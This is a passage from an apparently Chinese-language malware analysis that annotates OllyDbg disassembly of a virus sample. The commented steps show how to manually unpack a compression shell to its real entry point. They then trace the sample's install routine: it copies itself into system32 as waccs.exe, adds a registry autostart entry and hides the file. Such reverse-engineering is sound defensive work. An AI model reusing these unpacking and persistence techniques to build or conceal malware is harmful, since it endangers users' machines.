00401EFA C1C2 13 ROL EDX,13
00401EFD C1E8 18 SHR EAX,18
00401F00 E9 10000000 JMP misfotos.00401F15
00401F05 1315 A0FB4000 ADC EDX,DWORD PTR DS:[40FBA0]
00401F0B B9 824E7AB1 MOV ECX,B17A4E82
00401F10 B8 8AA4C975 MOV EAX,75C9A48A
00401F15 68 82000000 PUSH 82
00401F1A FF15 CE914100 CALL DWORD PTR DS:[4191CE] ; GDI32.GetTextColor
00401F20 190D 20FC4000 SBB DWORD PTR DS:[40FC20],ECX
00401F26 C1EA 0B SHR EDX,0B
00401F29 130D C0FD4000 ADC ECX,DWORD PTR DS:[40FDC0]
00401F2F E9 10000000 JMP misfotos.00401F44
00401F34 B8 6587CF97 MOV EAX,97CF8765
00401F39 81C1 0E541C99 ADD ECX,991C540E
00401F3F B8 957536C9 MOV EAX,C9367595
00401F44 61 POPAD
00401F45 68 64000000 PUSH 64
00401F4A FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectType
00401F50 81D2 E1473A10 ADC EDX,103A47E1
00401F56 C1C1 02 ROL ECX,2
00401F59 C1D2 01 RCL EDX,1
00401F5C 3BC8 CMP ECX,EAX
00401F5E 76 07 JBE SHORT misfotos.00401F67
00401F60 BA 4E40CC04 MOV EDX,4CC404E
00401F65 23C8 AND ECX,EAX
00401F67 1915 40FE4000 SBB DWORD PTR DS:[40FE40],EDX
00401F6D 81D1 B9200B37 ADC ECX,370B20B9
00401F73 C1DA 10 RCR EDX,10
00401F76 68 64000000 PUSH 64
00401F7B 68 DC000000 PUSH 0DC
00401F80 FF15 A2914100 CALL DWORD PTR DS:[4191A2] ; GDI32.GetMetaRgn
00401F86 81C9 196ABB10 OR ECX,10BB6A19
00401F8C 0B05 50F94000 OR EAX,DWORD PTR DS:[40F950]
00401F92 81E2 C985C27A AND EDX,7AC285C9
00401F98 68 5A000000 PUSH 5A
00401F9D FF15 CE914100 CALL DWORD PTR DS:[4191CE] ; GDI32.GetTextColor
00401FA3 C1F9 06 SAR ECX,6
00401FA6 C1F0 0F SAL EAX,0F
00401FA9 B9 A58554AF MOV ECX,AF5485A5
00401FAE E9 0C000000 JMP misfotos.00401FBF
00401FB3 3305 D0FE4000 XOR EAX,DWORD PTR DS:[40FED0]
00401FB9 2315 00FB4000 AND EDX,DWORD PTR DS:[40FB00]
00401FBF C3 RETN
----------------------------------------------------------------------------------------------------
第三层:压缩壳
003C0000 55 PUSH EBP ; 第三层压缩壳入口处.[F8]向下走.
003C0001 8BEC MOV EBP,ESP
003C0003 81EC 90000000 SUB ESP,90
003C0009 E8 00000000 CALL 003C000E ; [F7]步入.
003C000E 58 POP EAX ; 步入后来到这里,继续[F8]向下走.
003C000F 8BF0 MOV ESI,EAX
003C0011 2D 2B144000 SUB EAX,40142B
003C0016 8945 A0 MOV DWORD PTR SS:[EBP-60],EAX
003C0019 81E6 00F0FFFF AND ESI,FFFFF000
003C001F 8975 B0 MOV DWORD PTR SS:[EBP-50],ESI
003C0022 8B75 04 MOV ESI,DWORD PTR SS:[EBP+4]
003C0025 81E6 00F0FFFF AND ESI,FFFFF000
003C002B 66:813E 4D5A CMP WORD PTR DS:[ESI],5A4D
003C0030 74 08 JE SHORT 003C003A
003C0032 81EE 00100000 SUB ESI,1000
003C0038 ^ EB F1 JMP SHORT 003C002B ; 这里的循环回跳不要跳.
003C003A 8B46 3C MOV EAX,DWORD PTR DS:[ESI+3C] ; 我们[F4]执行到这里,继续[F8]向下走.
003C003D 3D 00200000 CMP EAX,2000
003C0042 ^ 77 EE JA SHORT 003C0032
003C0044 03C6 ADD EAX,ESI
003C0046 8138 50450000 CMP DWORD PTR DS:[EAX],4550
003C004C ^ 75 E4 JNZ SHORT 003C0032
003C004E 8975 C8 MOV DWORD PTR SS:[EBP-38],ESI
003C0051 8B46 3C MOV EAX,DWORD PTR DS:[ESI+3C]
003C0054 0345 C8 ADD EAX,DWORD PTR SS:[EBP-38]
003C0057 8B48 28 MOV ECX,DWORD PTR DS:[EAX+28]
003C005A 034D C8 ADD ECX,DWORD PTR SS:[EBP-38]
003C005D 894D AC MOV DWORD PTR SS:[EBP-54],ECX
003C0060 64:A1 30000000 MOV EAX,DWORD PTR FS:[30]
003C0066 8B40 0C MOV EAX,DWORD PTR DS:[EAX+C]
003C0069 8B40 1C MOV EAX,DWORD PTR DS:[EAX+1C]
003C006C 8B00 MOV EAX,DWORD PTR DS:[EAX]
003C006E 8B40 08 MOV EAX,DWORD PTR DS:[EAX+8]
003C0071 8945 F8 MOV DWORD PTR SS:[EBP-8],EAX
003C0074 B8 44332211 MOV EAX,11223344
003C0079 B8 44332211 MOV EAX,11223344
003C007E 68 00700000 PUSH 7000
003C0083 68 7BD1486C PUSH 6C48D17B
003C0088 68 691EAD0F PUSH 0FAD1E69
003C008D 68 00880000 PUSH 8800
003C0092 8F45 80 POP DWORD PTR SS:[EBP-80]
003C0095 8F85 70FFFFFF POP DWORD PTR SS:[EBP-90]
003C009B 8F45 94 POP DWORD PTR SS:[EBP-6C]
003C009E 8F45 9C POP DWORD PTR SS:[EBP-64]
003C00A1 8D35 8D184000 LEA ESI,DWORD PTR DS:[40188D]
003C00A7 0375 A0 ADD ESI,DWORD PTR SS:[EBP-60]
003C00AA 8D7D D8 LEA EDI,DWORD PTR SS:[EBP-28]
003C00AD 56 PUSH ESI
003C00AE 56 PUSH ESI
003C00AF FF75 F8 PUSH DWORD PTR SS:[EBP-8]
003C00B2 E8 22030000 CALL 003C03D9 ; 这个CALL可以直接[F8]步过.
003C00B7 AB STOS DWORD PTR ES:[EDI]
003C00B8 5E POP ESI
003C00B9 46 INC ESI
003C00BA 807E FF 00 CMP BYTE PTR DS:[ESI-1],0
003C00BE ^ 75 F9 JNZ SHORT 003C00B9 ; 这里的循环回跳不要跳.
003C00C0 803E AB CMP BYTE PTR DS:[ESI],0AB ; 我们[F4]执行到这里,继续[F8]向下走.
003C00C3 ^ 75 E8 JNZ SHORT 003C00AD ; 这里的循环回跳不要跳.
003C00C5 8B5D 94 MOV EBX,DWORD PTR SS:[EBP-6C] ; 我们[F4]执行到这里,继续[F8]向下走.
003C00C8 8B95 70FFFFFF MOV EDX,DWORD PTR SS:[EBP-90]
003C00CE 8B4D 80 MOV ECX,DWORD PTR SS:[EBP-80]
003C00D1 60 PUSHAD
003C00D2 6A 40 PUSH 40
003C00D4 68 00100000 PUSH 1000
003C00D9 51 PUSH ECX
003C00DA 6A 00 PUSH 0
003C00DC FF55 E8 CALL DWORD PTR SS:[EBP-18]
003C00DF 8945 90 MOV DWORD PTR SS:[EBP-70],EAX
003C00E2 0BC0 OR EAX,EAX
003C00E4 61 POPAD
003C00E5 0F84 D8020000 JE 003C03C3
003C00EB C1E9 02 SHR ECX,2
003C00EE 8B75 9C MOV ESI,DWORD PTR SS:[EBP-64]
003C00F1 0375 C8 ADD ESI,DWORD PTR SS:[EBP-38]
003C00F4 8B7D 90 MOV EDI,DWORD PTR SS:[EBP-70]
003C00F7 AD LODS DWORD PTR DS:[ESI]
003C00F8 2BC2 SUB EAX,EDX
003C00FA 33C3 XOR EAX,EBX
003C00FC AB STOS DWORD PTR ES:[EDI]
003C00FD ^ E2 F8 LOOPD SHORT 003C00F7 ; 这里的循环回跳不要跳.
003C00FF 8B45 90 MOV EAX,DWORD PTR SS:[EBP-70] ; 我们[F4]执行到这里,继续[F8]向下走.
003C0102 8B58 3C MOV EBX,DWORD PTR DS:[EAX+3C]
003C0105 035D 90 ADD EBX,DWORD PTR SS:[EBP-70]
003C0108 895D B4 MOV DWORD PTR SS:[EBP-4C],EBX
003C010B 8D83 F8000000 LEA EAX,DWORD PTR DS:[EBX+F8]
003C0111 8945 BC MOV DWORD PTR SS:[EBP-44],EAX
003C0114 0FB743 06 MOVZX EAX,WORD PTR DS:[EBX+6]
003C0118 8945 A4 MOV DWORD PTR SS:[EBP-5C],EAX
003C011B 8B43 28 MOV EAX,DWORD PTR DS:[EBX+28]
003C011E 8985 78FFFFFF MOV DWORD PTR SS:[EBP-88],EAX
003C0124 8B83 80000000 MOV EAX,DWORD PTR DS:[EBX+80]
003C012A 8945 98 MOV DWORD PTR SS:[EBP-68],EAX
003C012D 8B43 50 MOV EAX,DWORD PTR DS:[EBX+50]
003C0130 8985 74FFFFFF MOV DWORD PTR SS:[EBP-8C],EAX
003C0136 8B45 90 MOV EAX,DWORD PTR SS:[EBP-70]
003C0139 8B58 3C MOV EBX,DWORD PTR DS:[EAX+3C]
003C013C 035D C8 ADD EBX,DWORD PTR SS:[EBP-38]
003C013F 895D C4 MOV DWORD PTR SS:[EBP-3C],EBX
003C0142 81C3 F8000000 ADD EBX,0F8
003C0148 895D BC MOV DWORD PTR SS:[EBP-44],EBX
003C014B 8D45 D0 LEA EAX,DWORD PTR SS:[EBP-30]
003C014E 50 PUSH EAX
003C014F 6A 40 PUSH 40
003C0151 FFB5 74FFFFFF PUSH DWORD PTR SS:[EBP-8C]
003C0157 FF75 C8 PUSH DWORD PTR SS:[EBP-38]
003C015A FF55 E4 CALL DWORD PTR SS:[EBP-1C]
003C015D 0BC0 OR EAX,EAX
003C015F 0F84 5E020000 JE 003C03C3
003C0165 8B8D 74FFFFFF MOV ECX,DWORD PTR SS:[EBP-8C]
003C016B C1E9 02 SHR ECX,2
003C016E 33C0 XOR EAX,EAX
003C0170 8B7D C8 MOV EDI,DWORD PTR SS:[EBP-38]
003C0173 F3:AB REP STOS DWORD PTR ES:[EDI]
003C0175 B9 00100000 MOV ECX,1000
003C017A 8B75 90 MOV ESI,DWORD PTR SS:[EBP-70]
003C017D 8B7D C8 MOV EDI,DWORD PTR SS:[EBP-38]
003C0180 E8 23020000 CALL 003C03A8 ; 这个CALL可以直接[F8]步过.
003C0185 8B55 A4 MOV EDX,DWORD PTR SS:[EBP-5C]
003C0188 8B5D B4 MOV EBX,DWORD PTR SS:[EBP-4C]
003C018B 81C3 F8000000 ADD EBX,0F8
003C0191 8B75 90 MOV ESI,DWORD PTR SS:[EBP-70]
003C0194 0373 14 ADD ESI,DWORD PTR DS:[EBX+14]
003C0197 8B7D C8 MOV EDI,DWORD PTR SS:[EBP-38]
003C019A 037B 0C ADD EDI,DWORD PTR DS:[EBX+C]
003C019D 8B4B 10 MOV ECX,DWORD PTR DS:[EBX+10]
003C01A0 E8 03020000 CALL 003C03A8 ; 这个CALL可以直接[F8]步过.
003C01A5 83C3 28 ADD EBX,28
003C01A8 4A DEC EDX
003C01A9 ^ 75 E6 JNZ SHORT 003C0191 ; 这里的循环回跳不要跳.
003C01AB 68 00800000 PUSH 8000 ; 我们[F4]执行到这里,继续[F8]向下走.
003C01B0 6A 00 PUSH 0
003C01B2 FF75 90 PUSH DWORD PTR SS:[EBP-70]
003C01B5 FF55 EC CALL DWORD PTR SS:[EBP-14]
003C01B8 8B5D C4 MOV EBX,DWORD PTR SS:[EBP-3C]
003C01BB 8B83 80000000 MOV EAX,DWORD PTR DS:[EBX+80]
003C01C1 0BC0 OR EAX,EAX
003C01C3 0F84 9B000000 JE 003C0264
003C01C9 0345 C8 ADD EAX,DWORD PTR SS:[EBP-38]
003C01CC 8945 FC MOV DWORD PTR SS:[EBP-4],EAX
003C01CF C745 B8 0000000>MOV DWORD PTR SS:[EBP-48],0
003C01D6 8B5D FC MOV EBX,DWORD PTR SS:[EBP-4]
003C01D9 8B43 0C MOV EAX,DWORD PTR DS:[EBX+C]
003C01DC 0BC0 OR EAX,EAX
003C01DE 0F84 80000000 JE 003C0264
003C01E4 0345 C8 ADD EAX,DWORD PTR SS:[EBP-38]
003C01E7 50 PUSH EAX
003C01E8 50 PUSH EAX
003C01E9 FF55 DC CALL DWORD PTR SS:[EBP-24]
003C01EC 0BC0 OR EAX,EAX
003C01EE 59 POP ECX
003C01EF 75 04 JNZ SHORT 003C01F5
003C01F1 51 PUSH ECX
003C01F2 FF55 E0 CALL DWORD PTR SS:[EBP-20]
003C01F5 8945 C0 MOV DWORD PTR SS:[EBP-40],EAX
003C01F8 8B5D FC MOV EBX,DWORD PTR SS:[EBP-4]
003C01FB 8B43 10 MOV EAX,DWORD PTR DS:[EBX+10]
003C01FE 0345 C8 ADD EAX,DWORD PTR SS:[EBP-38]
003C0201 8945 A8 MOV DWORD PTR SS:[EBP-58],EAX
003C0204 8B03 MOV EAX,DWORD PTR DS:[EBX]
003C0206 0BC0 OR EAX,EAX
003C0208 75 14 JNZ SHORT 003C021E
003C020A 8B45 A8 MOV EAX,DWORD PTR SS:[EBP-58]
003C020D 2B45 C8 SUB EAX,DWORD PTR SS:[EBP-38]
003C0210 3D FFFFAF00 CMP EAX,0AFFFFF
003C0215 77 44 JA SHORT 003C025B
003C0217 3D 00100000 CMP EAX,1000
003C021C 72 3D JB SHORT 003C025B
003C021E 0345 C8 ADD EAX,DWORD PTR SS:[EBP-38]
003C0221 8945 D4 MOV DWORD PTR SS:[EBP-2C],EAX
003C0224 8B75 D4 MOV ESI,DWORD PTR SS:[EBP-2C]
003C0227 0375 B8 ADD ESI,DWORD PTR SS:[EBP-48]
003C022A 8B36 MOV ESI,DWORD PTR DS:[ESI]
003C022C 0BF6 OR ESI,ESI
003C022E 74 2B JE SHORT 003C025B
003C0230 8BC6 MOV EAX,ESI
003C0232 25 00000080 AND EAX,80000000
003C0237 74 08 JE SHORT 003C0241
003C0239 81E6 FFFFFF4F AND ESI,4FFFFFFF
003C023F EB 06 JMP SHORT 003C0247
003C0241 0375 C8 ADD ESI,DWORD PTR SS:[EBP-38]
003C0244 83C6 02 ADD ESI,2
003C0247 56 PUSH ESI
003C0248 FF75 C0 PUSH DWORD PTR SS:[EBP-40]
003C024B FF55 D8 CALL DWORD PTR SS:[EBP-28]
003C024E 8B7D B8 MOV EDI,DWORD PTR SS:[EBP-48]
003C0251 037D A8 ADD EDI,DWORD PTR SS:[EBP-58]
003C0254 AB STOS DWORD PTR ES:[EDI]
003C0255 8345 B8 04 ADD DWORD PTR SS:[EBP-48],4
003C0259 ^ EB C9 JMP SHORT 003C0224 ; 这里的循环回跳不要跳.
003C025B 8345 FC 14 ADD DWORD PTR SS:[EBP-4],14 ; 我们[F4]执行到这里,继续[F8]向下走.
003C025F ^ E9 6BFFFFFF JMP 003C01CF ; 这里的循环回跳不要跳.
003C0264 8B45 C4 MOV EAX,DWORD PTR SS:[EBP-3C] ; 我们[F4]执行到这里,继续[F8]向下走.
003C0267 8B70 34 MOV ESI,DWORD PTR DS:[EAX+34]
003C026A 8975 88 MOV DWORD PTR SS:[EBP-78],ESI
003C026D 8BB0 A0000000 MOV ESI,DWORD PTR DS:[EAX+A0]
003C0273 0BF6 OR ESI,ESI
003C0275 74 47 JE SHORT 003C02BE
003C0277 FFB0 A4000000 PUSH DWORD PTR DS:[EAX+A4]
003C027D 8F45 CC POP DWORD PTR SS:[EBP-34]
003C0280 0375 C8 ADD ESI,DWORD PTR SS:[EBP-38]
003C0283 8B5D C8 MOV EBX,DWORD PTR SS:[EBP-38]
003C0286 2B5D 88 SUB EBX,DWORD PTR SS:[EBP-78]
003C0289 AD LODS DWORD PTR DS:[ESI]
003C028A 8BF8 MOV EDI,EAX
003C028C AD LODS DWORD PTR DS:[ESI]
003C028D 8BC8 MOV ECX,EAX
003C028F 83F8 08 CMP EAX,8
003C0292 7E 2A JLE SHORT 003C02BE
003C0294 294D CC SUB DWORD PTR SS:[EBP-34],ECX
003C0297 83E9 08 SUB ECX,8
003C029A D1E9 SHR ECX,1
003C029C 33C0 XOR EAX,EAX
003C029E 66:AD LODS WORD PTR DS:[ESI]
003C02A0 8BD0 MOV EDX,EAX
003C02A2 C1EA 0C SHR EDX,0C
003C02A5 83FA 03 CMP EDX,3
003C02A8 75 0C JNZ SHORT 003C02B6
003C02AA 25 FF0F0000 AND EAX,0FFF
003C02AF 0345 C8 ADD EAX,DWORD PTR SS:[EBP-38]
003C02B2 03C7 ADD EAX,EDI
003C02B4 0118 ADD DWORD PTR DS:[EAX],EBX
003C02B6 ^ E2 E4 LOOPD SHORT 003C029C
003C02B8 837D CC 00 CMP DWORD PTR SS:[EBP-34],0
003C02BC ^ 7F CB JG SHORT 003C0289
003C02BE 8B45 C8 MOV EAX,DWORD PTR SS:[EBP-38]
003C02C1 0185 78FFFFFF ADD DWORD PTR SS:[EBP-88],EAX
003C02C7 8B45 C8 MOV EAX,DWORD PTR SS:[EBP-38]
003C02CA 3B85 78FFFFFF CMP EAX,DWORD PTR SS:[EBP-88]
003C02D0 75 0A JNZ SHORT 003C02DC
003C02D2 C785 78FFFFFF 0>MOV DWORD PTR SS:[EBP-88],0
003C02DC 8B4D C8 MOV ECX,DWORD PTR SS:[EBP-38]
003C02DF 64:A1 18000000 MOV EAX,DWORD PTR FS:[18]
003C02E5 8B40 30 MOV EAX,DWORD PTR DS:[EAX+30]
003C02E8 8B70 08 MOV ESI,DWORD PTR DS:[EAX+8]
003C02EB 3B75 C8 CMP ESI,DWORD PTR SS:[EBP-38]
003C02EE 74 1E JE SHORT 003C030E
003C02F0 8B40 0C MOV EAX,DWORD PTR DS:[EAX+C]
003C02F3 8B40 1C MOV EAX,DWORD PTR DS:[EAX+1C]
003C02F6 BA 00100000 MOV EDX,1000
003C02FB 4A DEC EDX
003C02FC 74 10 JE SHORT 003C030E
003C02FE 8B00 MOV EAX,DWORD PTR DS:[EAX]
003C0300 3B48 08 CMP ECX,DWORD PTR DS:[EAX+8]
003C0303 ^ 75 F6 JNZ SHORT 003C02FB
003C0305 8BB5 78FFFFFF MOV ESI,DWORD PTR SS:[EBP-88]
003C030B 8970 0C MOV DWORD PTR DS:[EAX+C],ESI
003C030E 8D45 D0 LEA EAX,DWORD PTR SS:[EBP-30]
003C0311 50 PUSH EAX
003C0312 6A 20 PUSH 20
003C0314 FFB5 74FFFFFF PUSH DWORD PTR SS:[EBP-8C]
003C031A FF75 C8 PUSH DWORD PTR SS:[EBP-38]
003C031D FF55 E4 CALL DWORD PTR SS:[EBP-1C]
003C0320 8B75 C4 MOV ESI,DWORD PTR SS:[EBP-3C]
003C0323 0FB74E 06 MOVZX ECX,WORD PTR DS:[ESI+6]
003C0327 81C6 F8000000 ADD ESI,0F8
003C032D 60 PUSHAD
003C032E 8B46 24 MOV EAX,DWORD PTR DS:[ESI+24]
003C0331 25 00000080 AND EAX,80000000
003C0336 74 13 JE SHORT 003C034B
003C0338 8D45 D0 LEA EAX,DWORD PTR SS:[EBP-30]
003C033B 50 PUSH EAX
003C033C 6A 40 PUSH 40
003C033E FF76 08 PUSH DWORD PTR DS:[ESI+8]
003C0341 8B46 0C MOV EAX,DWORD PTR DS:[ESI+C]
003C0344 0345 C8 ADD EAX,DWORD PTR SS:[EBP-38]
003C0347 50 PUSH EAX
003C0348 FF55 E4 CALL DWORD PTR SS:[EBP-1C]
003C034B 61 POPAD
003C034C 83C6 28 ADD ESI,28
003C034F ^ E2 DC LOOPD SHORT 003C032D ; 这里的循环回跳不要跳.
003C0351 83BD 78FFFFFF 0>CMP DWORD PTR SS:[EBP-88],0 ; 我们[F4]执行到这里,继续[F8]向下走.
003C0358 75 26 JNZ SHORT 003C0380
003C035A 8BE5 MOV ESP,EBP
003C035C 5D POP EBP
003C035D 83C4 04 ADD ESP,4
003C0360 8B4C24 18 MOV ECX,DWORD PTR SS:[ESP+18]
003C0364 8B5424 14 MOV EDX,DWORD PTR SS:[ESP+14]
003C0368 8B5C24 10 MOV EBX,DWORD PTR SS:[ESP+10]
003C036C 8B6C24 08 MOV EBP,DWORD PTR SS:[ESP+8]
003C0370 8B7424 04 MOV ESI,DWORD PTR SS:[ESP+4]
003C0374 8B3C24 MOV EDI,DWORD PTR SS:[ESP]
003C0377 83C4 20 ADD ESP,20
003C037A B8 01000000 MOV EAX,1
003C037F C3 RETN
003C0380 8B85 78FFFFFF MOV EAX,DWORD PTR SS:[EBP-88]
003C0386 8BE5 MOV ESP,EBP
003C0388 5D POP EBP
003C0389 83C4 04 ADD ESP,4
003C038C 8B4C24 18 MOV ECX,DWORD PTR SS:[ESP+18]
003C0390 8B5424 14 MOV EDX,DWORD PTR SS:[ESP+14]
003C0394 8B5C24 10 MOV EBX,DWORD PTR SS:[ESP+10]
003C0398 8B6C24 08 MOV EBP,DWORD PTR SS:[ESP+8]
003C039C 8B7424 04 MOV ESI,DWORD PTR SS:[ESP+4]
003C03A0 8B3C24 MOV EDI,DWORD PTR SS:[ESP]
003C03A3 83C4 20 ADD ESP,20
003C03A6 - FFE0 JMP EAX ; 这里是关键跳转,它会跳向下一个OEP入口处.
003C03A8 52 PUSH EDX
003C03A9 8BD1 MOV EDX,ECX
003C03AB C1E9 02 SHR ECX,2
003C03AE 83E2 03 AND EDX,3
003C03B1 0BC9 OR ECX,ECX
003C03B3 74 02 JE SHORT 003C03B7
003C03B5 F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>
003C03B7 03CA ADD ECX,EDX
003C03B9 0BC9 OR ECX,ECX
003C03BB 74 04 JE SHORT 003C03C1
003C03BD 8BCA MOV ECX,EDX
003C03BF F3:A4 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[>
003C03C1 5A POP EDX
003C03C2 C3 RETN
----------------------------------------------------------------------------------------------------
手脱完毕,程序的真实入口:
00402B96 55 PUSH EBP ; 这里是脱壳后的真实入口,在这里就可以DUMP了(输入表没有被破坏,脱壳保存后样本可以正常运行).
00402B97 8BEC MOV EBP,ESP
00402B99 81EC E4070000 SUB ESP,7E4
00402B9F 6A 01 PUSH 1
00402BA1 FF15 A0804000 CALL DWORD PTR DS:[4080A0] ; kernel32.SetErrorMode
00402BA7 68 04010000 PUSH 104
00402BAC 6A 00 PUSH 0
00402BAE 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
00402BB4 50 PUSH EAX
00402BB5 E8 80440000 CALL misfotos.0040703A ; JMP 到 msvcrt.memset
00402BBA 83C4 0C ADD ESP,0C
00402BBD 68 04010000 PUSH 104
00402BC2 6A 00 PUSH 0
00402BC4 8D85 ACF8FFFF LEA EAX,DWORD PTR SS:[EBP-754]
00402BCA 50 PUSH EAX
00402BCB E8 6A440000 CALL misfotos.0040703A ; JMP 到 msvcrt.memset
00402BD0 83C4 0C ADD ESP,0C
00402BD3 68 04010000 PUSH 104
00402BD8 6A 00 PUSH 0
00402BDA 8D85 B4F9FFFF LEA EAX,DWORD PTR SS:[EBP-64C]
00402BE0 50 PUSH EAX
00402BE1 E8 54440000 CALL misfotos.0040703A ; JMP 到 msvcrt.memset
00402BE6 83C4 0C ADD ESP,0C
00402BE9 68 04010000 PUSH 104
00402BEE 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
00402BF4 50 PUSH EAX
00402BF5 6A 00 PUSH 0
00402BF7 FF15 9C804000 CALL DWORD PTR DS:[40809C] ; kernel32.GetModuleHandleA
00402BFD 50 PUSH EAX
00402BFE FF15 98804000 CALL DWORD PTR DS:[408098] ; kernel32.GetModuleFileNameA
00402C04 68 04010000 PUSH 104
00402C09 8D85 B4F9FFFF LEA EAX,DWORD PTR SS:[EBP-64C]
00402C0F 50 PUSH EAX
00402C10 FF15 94804000 CALL DWORD PTR DS:[408094] ; kernel32.GetSystemDirectoryA
----------------------------------------------------------------------------------------------------
****************************************************************************************************
二、样本分析部分:
----------------------------------------------------------------------------------------------------
1、当样本执行安装功能时的分析:
00402B96 55 PUSH EBP ; 程序入口.
00402B97 8BEC MOV EBP,ESP
00402B99 81EC E4070000 SUB ESP,7E4
00402B9F 6A 01 PUSH 1 ; ErrorMode = SEM_FAILCRITICALERRORS
00402BA1 FF15 A0804000 CALL DWORD PTR DS:[4080A0] ; kernel32.SetErrorMode
00402BA7 68 04010000 PUSH 104
00402BAC 6A 00 PUSH 0
00402BAE 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
00402BB4 50 PUSH EAX
00402BB5 E8 80440000 CALL misfotos.0040703A ; JMP 到 msvcrt.memset
00402BBA 83C4 0C ADD ESP,0C
00402BBD 68 04010000 PUSH 104
00402BC2 6A 00 PUSH 0
00402BC4 8D85 ACF8FFFF LEA EAX,DWORD PTR SS:[EBP-754]
00402BCA 50 PUSH EAX
00402BCB E8 6A440000 CALL misfotos.0040703A ; JMP 到 msvcrt.memset
00402BD0 83C4 0C ADD ESP,0C
00402BD3 68 04010000 PUSH 104
00402BD8 6A 00 PUSH 0
00402BDA 8D85 B4F9FFFF LEA EAX,DWORD PTR SS:[EBP-64C]
00402BE0 50 PUSH EAX
00402BE1 E8 54440000 CALL misfotos.0040703A ; JMP 到 msvcrt.memset
00402BE6 83C4 0C ADD ESP,0C
00402BE9 68 04010000 PUSH 104
00402BEE 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
00402BF4 50 PUSH EAX
00402BF5 6A 00 PUSH 0
00402BF7 FF15 9C804000 CALL DWORD PTR DS:[40809C] ; kernel32.GetModuleHandleA
00402BFD 50 PUSH EAX
00402BFE FF15 98804000 CALL DWORD PTR DS:[408098] ; kernel32.GetModuleFileNameA(获取程序自身当前路径名).
00402C04 68 04010000 PUSH 104
00402C09 8D85 B4F9FFFF LEA EAX,DWORD PTR SS:[EBP-64C]
00402C0F 50 PUSH EAX
00402C10 FF15 94804000 CALL DWORD PTR DS:[408094] ; kernel32.GetSystemDirectoryA(获取系统SYSTEM32文件夹路径名).
00402C16 68 1BD7A201 PUSH 1A2D71B
00402C1B 8D8D 8CF8FFFF LEA ECX,DWORD PTR SS:[EBP-774]
00402C21 E8 4A040000 CALL misfotos.00403070 ; ASCII "waccs.exe"
00402C26 50 PUSH EAX
00402C27 8D85 B4F9FFFF LEA EAX,DWORD PTR SS:[EBP-64C]
00402C2D 50 PUSH EAX
00402C2E 68 C9276909 PUSH 96927C9
00402C33 8D8D 84F8FFFF LEA ECX,DWORD PTR SS:[EBP-77C]
00402C39 E8 D2030000 CALL misfotos.00403010 ; ASCII "%s\%s"
00402C3E 50 PUSH EAX
00402C3F 68 04010000 PUSH 104
00402C44 8D85 ACF8FFFF LEA EAX,DWORD PTR SS:[EBP-754]
00402C4A 50 PUSH EAX
00402C4B E8 F0430000 CALL misfotos.00407040 ; JMP 到 msvcrt._snprintf(ASCII "C:\WINDOWS\system32\waccs.exe").
00402C50 83C4 14 ADD ESP,14
00402C53 8D8D 84F8FFFF LEA ECX,DWORD PTR SS:[EBP-77C]
00402C59 E8 28F3FFFF CALL misfotos.00401F86 ; 清除内存数据.
00402C5E 8D8D 8CF8FFFF LEA ECX,DWORD PTR SS:[EBP-774]
00402C64 E8 85F4FFFF CALL misfotos.004020EE ; 清除内存数据.
00402C69 68 2FD7A201 PUSH 1A2D72F
00402C6E 8D8D 78F8FFFF LEA ECX,DWORD PTR SS:[EBP-788]
00402C74 E8 F7030000 CALL misfotos.00403070 ; ASCII "waccs.exe"
00402C79 50 PUSH EAX
00402C7A E8 F1140000 CALL misfotos.00404170 ; 在注册表中添加病毒启动项.
00402C7F 59 POP ECX
00402C80 8D8D 78F8FFFF LEA ECX,DWORD PTR SS:[EBP-788]
00402C86 E8 63F4FFFF CALL misfotos.004020EE ; 清除内存数据.
00402C8B 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
00402C91 50 PUSH EAX ; /s2 = "C:\Documents and Settings\Coderui\桌面\virus.exe"
00402C92 8D85 ACF8FFFF LEA EAX,DWORD PTR SS:[EBP-754]
00402C98 50 PUSH EAX ; |s1 = "C:\WINDOWS\system32\waccs.exe"
00402C99 E8 04440000 CALL misfotos.004070A2 ; JMP 到 msvcrt.strcmp(字符串比较)
00402C9E 59 POP ECX
00402C9F 59 POP ECX
00402CA0 85C0 TEST EAX,EAX ; 判断比较结果.
00402CA2 74 70 JE SHORT misfotos.00402D14 ; 如果s2 != s1,则该病毒程序执行安装(安装功能)操作;如果s2 == s1,则该病毒程序执行恶意(主要功能)操作.
00402CA4 83A5 A8F8FFFF 0>AND DWORD PTR SS:[EBP-758],0 ; 如果s2 != s1,则该病毒程序从这里开始执行安装操作.
00402CAB EB 0D JMP SHORT misfotos.00402CBA
00402CAD 8B85 A8F8FFFF MOV EAX,DWORD PTR SS:[EBP-758]
00402CB3 40 INC EAX
00402CB4 8985 A8F8FFFF MOV DWORD PTR SS:[EBP-758],EAX
00402CBA 83BD A8F8FFFF 0>CMP DWORD PTR SS:[EBP-758],5
00402CC1 7D 1E JGE SHORT misfotos.00402CE1
00402CC3 6A 00 PUSH 0 ; /FailIfExists = FALSE
00402CC5 8D85 ACF8FFFF LEA EAX,DWORD PTR SS:[EBP-754]
00402CCB 50 PUSH EAX ; |NewFileName = "C:\WINDOWS\system32\waccs.exe"
00402CCC 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
00402CD2 50 PUSH EAX ; |s2 = "C:\Documents and Settings\Coderui\桌面\virus.exe"
00402CD3 FF15 90804000 CALL DWORD PTR DS:[408090] ; kernel32.CopyFileA
00402CD9 85C0 TEST EAX,EAX ; 判断执行的结果.
00402CDB 74 02 JE SHORT misfotos.00402CDF ; 如果文件拷贝成功,则不执行跳转功能;如果文件拷贝失败,则跳到"00402CDF"地址处.
00402CDD EB 02 JMP SHORT misfotos.00402CE1 ; 文件拷贝成功,跳到"00402CE1"地址处继续执行后面的操作.
00402CDF ^ EB CC JMP SHORT misfotos.00402CAD ; 跳回去重新执行文件拷贝操作代码.
00402CE1 6A 07 PUSH 7
00402CE3 8D85 ACF8FFFF LEA EAX,DWORD PTR SS:[EBP-754] ; /FileAttributes = READONLY|HIDDEN|SYSTEM
00402CE9 50 PUSH EAX ; |FileName = "C:\WINDOWS\system32\waccs.exe"
